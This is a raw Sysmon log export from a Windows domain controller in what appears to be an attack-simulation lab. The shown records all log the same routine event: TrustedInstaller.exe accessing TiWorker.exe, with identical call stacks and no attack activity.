13:30:29.560{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.529{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.513{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.498{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.482{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.467{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:29.451{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 